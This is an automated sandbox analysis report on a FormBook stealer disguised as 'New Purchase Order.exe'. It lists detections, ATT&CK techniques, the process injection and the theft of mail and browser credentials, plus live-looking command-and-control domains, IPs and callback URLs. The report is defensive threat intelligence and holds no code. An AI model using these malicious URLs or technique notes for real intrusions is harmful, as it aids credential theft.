                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567394 Sample: New Purchase Order.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 30 www.070001325.xyz 2->30 32 www.expancz.top 2->32 34 3 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for submitted file 2->48 52 6 other signatures 2->52 10 New Purchase Order.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 file5 28 C:\Users\user\...28ew Purchase Order.exe.log, ASCII 10->28 dropped 13 New Purchase Order.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 snpURZzZKgO.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 tzutil.exe 13 16->19         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 22 snpURZzZKgO.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 36 www.expancz.top 107.155.56.30, 49910, 49917, 49923 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK United States 22->36 38 www.070001325.xyz 161.97.142.144, 49870, 80 CONTABODE United States 22->38 40 dns.ladipage.com 54.179.173.60, 49948, 49956, 49962 AMAZON-02US United States 22->40 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                New Purchase Order.exe42%ReversingLabsWin32.Backdoor.FormBook
                New Purchase Order.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.taxiquynhonnew.click0%Avira URL Cloudsafe
                https://l3filejson4dvd.josyliving.com/favicon.ico0%Avira URL Cloudsafe
                http://www.taxiquynhonnew.click/y49d/100%Avira URL Cloudmalware
                https://dq0ib5xlct7tw.cloudfront.net/0%Avira URL Cloudsafe
                http://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2100%Avira URL Cloudmalware
                http://www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z20%Avira URL Cloudsafe
                https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.expancz.top
                		107.155.56.30
                		truetrue
                  		unknown
                  dns.ladipage.com
                  		54.179.173.60
                  		truefalse
                    		high
                    s-part-0035.t-0009.t-msedge.net
                    		13.107.246.63
                    		truefalse
                      		high
                      www.070001325.xyz
                      		161.97.142.144
                      		truetrue
                        		unknown
                        www.epitomize.shop
                        		unknown
                        		unknownfalse
                          		unknown
                          www.taxiquynhonnew.click
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.taxiquynhonnew.click/y49d/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2true
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ac.ecosia.org/autocomplete?q=tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/chrome_newtabtzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMtzutil.exe, 00000008.00000002.2616065129.0000000003978000.00000004.10000000.00040000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002C78000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://l3filejson4dvd.josyliving.com/favicon.icotzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icotzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://connect.facebook.net/en_US/fbevents.jstzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://s.yimg.com/wi/ytc.jstzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          https://login.live.ctzutil.exe, 00000008.00000002.2611141533.00000000027FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://localhost/arkanoid_server/requests.phpNew Purchase Order.exe, 00000000.00000002.1397890145.00000000029D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://analytics.tiktok.com/i18n/pixel/events.jstzutil.exe, 00000008.00000002.2616065129.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.2617467331.0000000005BA0000.00000004.00000800.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://dq0ib5xlct7tw.cloudfront.net/snpURZzZKgO.exe, 00000009.00000002.2612463807.0000000002AE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tzutil.exe, 00000008.00000003.2135200873.00000000076D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.taxiquynhonnew.clicksnpURZzZKgO.exe, 00000009.00000002.2611954893.0000000000854000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        161.97.142.144
                                                        		www.070001325.xyzUnited States
                                                        		51167CONTABODEtrue
                                                        107.155.56.30
                                                        		www.expancz.topUnited States
                                                        		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKtrue
                                                        54.179.173.60
                                                        		dns.ladipage.comUnited States
                                                        		16509AMAZON-02USfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1567394
                                                        Start date and time:2024-12-03 14:14:47 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 1s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:11
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:New Purchase Order.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@5/3
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 89%
                                                        • Number of executed functions: 100
                                                        • Number of non-executed functions: 284
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • VT rate limit hit for: New Purchase Order.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        08:15:41API Interceptor1x Sleep call for process: New Purchase Order.exe modified
                                                        08:17:15API Interceptor80587x Sleep call for process: tzutil.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        161.97.142.144Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.070002018.xyz/6m2n/
                                                        Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                        • www.030002613.xyz/xd9h/
                                                        Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.030002449.xyz/cfqm/
                                                        PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                        • www.070001955.xyz/7zj0/
                                                        W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.54248711.xyz/jm2l/
                                                        IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.030002613.xyz/xd9h/
                                                        Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                        • www.070002018.xyz/6m2n/
                                                        PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                        • www.54248711.xyz/jm2l/
                                                        Quotation.exeGet hashmaliciousFormBookBrowse
                                                        • www.54248711.xyz/jm2l/
                                                        payments.exeGet hashmaliciousFormBookBrowse
                                                        • www.54248711.xyz/jm2l/
                                                        107.155.56.30Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.expancz.top/2gcl/
                                                        XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.expancz.top/2gcl/
                                                        54.179.173.60wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                        • www.tmstore.click/qmcg/
                                                        Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.tmstore.click/qmcg/
                                                        7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                        • www.tmstore.click/ih4w/
                                                        2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                        • www.tmstore.click/xme5/?mnShvP=n0CKpMQN4gGZ92M5/3EtOcSUkm26Kn20yY4QJn1V5vv9XAZ2vYFLUkiK71x3Mm43WM97SNcNOsfAT2BrwuTBRE9eXvmWucLueMGlkNS8dNMHocOVM3LStbA=&Cbj=nB9LWdWpMT7tUBt
                                                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                        • www.masteriocp.online/wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=
                                                        INV90097.exeGet hashmaliciousFormBookBrowse
                                                        • www.tenmoi.store/7tot/
                                                        TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                                        • www.againbeautywhiteskin.asia/3h10/
                                                        TT Slip.pif.exeGet hashmaliciousFormBookBrowse
                                                        • www.againbeautywhiteskin.asia/3h10/
                                                        TT-Slip.bat.exeGet hashmaliciousFormBookBrowse
                                                        • www.againbeautywhiteskin.asia/3h10/
                                                        BL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                        • www.bodyretinolvn.shop/n8t5/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        dns.ladipage.comDocs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 18.139.62.226
                                                        XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 13.228.81.39
                                                        Swift copy.exeGet hashmaliciousFormBookBrowse
                                                        • 18.139.62.226
                                                        wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                        • 54.179.173.60
                                                        COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                        • 18.139.62.226
                                                        Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 54.179.173.60
                                                        7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                        • 54.179.173.60
                                                        Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                        • 18.139.62.226
                                                        AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                        • 54.179.173.60
                                                        2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 54.179.173.60
                                                        www.expancz.topDocs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 107.155.56.30
                                                        XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 107.155.56.30
                                                        Swift copy.exeGet hashmaliciousFormBookBrowse
                                                        • 107.155.56.30
                                                        s-part-0035.t-0009.t-msedge.netSwiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.63
                                                        Pagamento deposito e fattura proforma firmata.xlsGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.63
                                                        PO# BBGR2411PO69.xlsGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.63
                                                        1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                        • 13.107.246.63
                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 13.107.246.63
                                                        001.xlsGet hashmaliciousGet2DownloaderBrowse
                                                        • 13.107.246.63
                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                        • 13.107.246.63
                                                        SFaLIQYuEV.htmGet hashmaliciousWinSearchAbuseBrowse
                                                        • 13.107.246.63
                                                        kjsdhf243kj2.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                        • 13.107.246.63
                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 13.107.246.63
                                                        www.070001325.xyzDocs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 161.97.142.144
                                                        XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 161.97.142.144
                                                        Swift copy.exeGet hashmaliciousFormBookBrowse
                                                        • 161.97.142.144

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AMAZON-02US0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                        • 54.150.207.131
                                                        NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                        • 108.158.75.92
                                                        https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                        • 13.227.8.37
                                                        https://chargeview.liveGet hashmaliciousUnknownBrowse
                                                        • 3.122.217.79
                                                        a-r.m-6.SNOOPY.elfGet hashmaliciousGafgytBrowse
                                                        • 54.171.230.55
                                                        phish_alert_sp2_2.0.0.0 (8).emlGet hashmaliciousUnknownBrowse
                                                        • 54.231.135.120
                                                        https://searchandprint.recipesGet hashmaliciousUnknownBrowse
                                                        • 108.158.75.111
                                                        https://es.vecteezy.com/arte-vectorial/20279878-kyd-letra-logo-diseno-en-blanco-antecedentes-kyd-creativo-circulo-letra-logo-concepto-kyd-letra-disenoGet hashmaliciousUnknownBrowse
                                                        • 52.19.224.221
                                                        Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                        • 45.112.123.126
                                                        https://lexplosiondemo.komtrol.in/Get hashmaliciousUnknownBrowse
                                                        • 3.7.129.70
                                                        UHGL-AS-APUCloudHKHoldingsGroupLimitedHKDocs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 107.155.56.30
                                                        nabppc.elfGet hashmaliciousUnknownBrowse
                                                        • 107.155.48.54
                                                        shell64.elfGet hashmaliciousConnectBackBrowse
                                                        • 45.43.36.223
                                                        XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 107.155.56.30
                                                        Swift copy.exeGet hashmaliciousFormBookBrowse
                                                        • 107.155.56.30
                                                        SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                        • 152.32.197.201
                                                        SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                        • 152.32.197.201
                                                        https://rwy.xpbf130.vip/Get hashmaliciousUnknownBrowse
                                                        • 101.36.121.234
                                                        http://cmn.ftft155.vip/Get hashmaliciousUnknownBrowse
                                                        • 101.36.121.234
                                                        http://cmn.xfor965.vip/Get hashmaliciousUnknownBrowse
                                                        • 101.36.121.234
                                                        CONTABODEQuotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 161.97.142.144
                                                        Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                        • 161.97.142.144
                                                        tDLozbx48F.exeGet hashmaliciousGurcu StealerBrowse
                                                        • 167.86.115.218
                                                        Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                        • 161.97.124.96
                                                        specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 161.97.168.245
                                                        loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 5.189.147.239
                                                        Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 161.97.142.144
                                                        OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                        • 161.97.168.245
                                                        Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 161.97.142.144
                                                        ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 161.97.168.245

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Purchase Order.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                        C:\Users\user\AppData\Local\Temp\UQ63g7r-

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\tzutil.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1221538113908904
                                                        Encrypted:false
                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                        MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                        SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                        SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                        SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.773475439043074
                                                        TrID:
